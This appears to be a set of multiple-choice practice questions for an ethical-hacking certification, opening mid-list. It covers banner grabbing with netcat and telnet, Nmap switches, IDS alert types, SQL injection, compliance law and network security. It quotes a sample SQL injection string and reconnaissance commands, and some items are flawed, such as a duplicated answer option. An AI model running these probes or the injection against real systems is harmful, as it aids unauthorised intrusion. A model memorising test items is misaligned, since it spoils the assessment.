- Cookie snooping
- Session hijacking
- Cookie hijacking
- Session sniffing

Which command would retrieve banner information from a website at port 80?
- nc 192.168.10.27 80
- nc 192.168.19.27 443
- nc 192.168.10.27 -p 80
- nc 192.168.10.27 -p -l 80

What is the command to retrieve header information from a web server using Telnet?
- telnet < website name > 80
- telnet < website name > 443
- telnet < website name > -port:80
- telnet < website name > -port:443

Groups and individuals who may hack a web server or web application based on principle or personal beliefs are known as __________.
- White hats
- Black hats
- Script kiddies
- Hacktivists

The Wayback Machine would be useful in viewing what type of information relating to a web application?
- Get Job postings
- Websites
- Archived versions of websites
- Backup copies of websites

What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?
- Encryption
- Permissions
- Redirection
- Firewalls

A common attack against web servers and web applications is __________.
- Banner grab
- Input validation
- Buffer validations
- Buffer overflow

Which of the following is a wireless network detector that is commonly found on Linux?
- Kismet
- Abel
- Netstumbler
- Nessus

A security consultant decides to use multiple layers of anti-virus defense, such as end-user desktop anti-virus and an e-mail gateway. This approach can be used to mitigate which kind of attack?
- Forensic attack
- ARP spoofing attack
- Social engineering attack
- Scanning attack

Code injection is a form of attack in which a malicious user:
- Inserts text into a data field that gets interpreted as code
- Gets the server to execute arbitrary code using a buffer overflow
- Inserts additional code into the JavaScript running in the browser
- Gains access to the codebase on the server and inserts new code

Sid is a judge for a programming contest. Before the code reaches him it goes through a restricted OS and is tested there. If it passes, then it moves on to Sid. What is this middle step called?
- Fuzzy-testing the code
- Third party running the code
- Sandboxing the code
- String validating the code

The Payment Card Industry Data Security Standard (PCI DSS) contains six different categories of control objectives. Each objective contains one or more requirements, which must be followed in order to achieve compliance. Which of the following requirements would best fit under the objective "Implement strong access control measures"?
- Regularly test security systems and processes
- Encrypt transmission of cardholder data across open, public networks
- Assign a unique ID to each person with computer access
- Use and regularly update anti-virus software on all systems commonly affected by malware

Which of the following acts requires employers' standard national numbers to identify them on standard transactions?
- SOXIT
- HIPAA
- DMCA
- PCI-DSS

Which of the following is an Nmap script that could help detect HTTP methods such as GET, POST, HEAD, PUT, DELETE, TRACE?
- http-git
- http-headers
- http enum
- http-methods

Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it has already established a session with his computer. How can Fred accomplish this?
- Fred can accomplish this by sending an IP packet with the RST/SYN bit and the source address of his computer
- He can send an IP packet with the SYN bit and the source address of his computer
- Fred can send an IP packet with the ACK bit set to zero and the source address of the switch
- Fred can send an IP packet to the switch with the ACK bit and the source address of his machine

What is the process of logging, recording, and resolving events that take place in an organization?
- Incident Management Process
- Security Policy
- Internal Procedure
- Metrics

A hacker has managed to gain access to a Linux host and stolen the password file from /etc/passwd. How can he use it?
- The password file does not contain the passwords themselves
- He can open it and read the user ids and corresponding passwords
- The file reveals the passwords to the root user only
- He cannot read it because it is encrypted

What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room?
- Set a BIOS password
- Encrypt the data on the hard drive
- Use a strong logon password to the operating system
- Back up everything on the laptop and store the backup in a safe place

You are manually conducting idle scanning using Hping2. During your scanning you notice that almost every query increments the IPID regardless of the port being queried. One or two of the queries cause the IPID to increment by more than one value. Why do you think this occurs?
- The zombie you are using is not truly idle
- A stateful inspection firewall is resetting your queries
- Hping2 cannot be used for idle scanning
- These ports are actually open on the target system

Darius is analysing IDS logs. During the investigation, he noticed that nothing suspicious was found and an alert was triggered on normal web application traffic. He can mark this alert as:
- False-Negative
- False-Positive
- True-Positive
- False-Signature

What is the proper response for a NULL scan if the port is closed?
- SYN
- ACK
- FIN
- PSH
- RST
- No response

The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASP's Top Ten Project Most Critical Web Application Security Risks?
- Injection
- Cross Site Scripting
- Cross Site Request Forgery
- Path disclosure

A recent security audit revealed that there were indeed several occasions on which the company's network was breached. After investigating, you discover that your IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the IDS giving?
- True Positive
- False Negative
- False Positive
- False Positive

Which vital role does the U.S. Computer Security Incident Response Team (CSIRT) provide?
- Incident response services to any user, company, government agency, or organization in partnership with the Department of Homeland Security
- Maintenance of the nation's Internet infrastructure, builds out new Internet infrastructure, and decommissions old Internet infrastructure
- Registration of critical penetration testing for the Department of Homeland Security and public and private sectors
- Measurement of key vulnerability assessments on behalf of the Department of Defense (DOD) and State Department, as well as private sectors

Which of the following is used to indicate a single-line comment in structured query language (SQL)?
- --
- ||
- %%
- ''

Suppose you are the Chief Network Engineer of a certain Telco. Your company is planning for a big business expansion and it requires that your network authenticate users connecting using analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol would you implement?
- TACACS+
- DIAMETER
- Kerberos
- RADIUS

Which of the following lists are valid data-gathering activities associated with a risk assessment?
- Threat identification, vulnerability identification, control analysis
- Threat identification, response identification, mitigation identification
- Attack profile, defense profile, loss profile
- System profile, vulnerability identification, security determination

Which of the following command line switches would you use for OS detection in Nmap?
- -D
- -O
- -P
- -X

A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The company accepting bids wants proof of work, so the consultant prints out several audits that have been performed. Which of the following is likely to occur as a result?
- The consultant will ask for money on the bid because of great work
- The consultant may expose vulnerabilities of other companies
- The company accepting bids will want the same type of format of testing
- The company accepting bids will hire the consultant because of the great work performed

What type of vulnerability/attack is it when the malicious person forces the user's browser to send an authenticated request to a server?
- Cross-site request forgery
- Cross-site scripting
- Session hijacking
- Server side request forgery

A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company's internal network. Which of the following can be implemented to minimize the opportunity for a man-in-the-middle attack to occur?
- SSL
- Mutual authentication
- IPSec
- Static IP addresses

If an attacker uses the command SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --'; which type of SQL injection attack is the attacker performing?
- End of Line Comment
- UNION SQL Injection
- Illegal/Logically Incorrect Query
- Tautology

What is GINA?
- Gateway Interface Network Application
- GUI Installed Network Application CLASS
- Global Internet National Authority (G-USA)
- Graphical Identification and Authentication DLL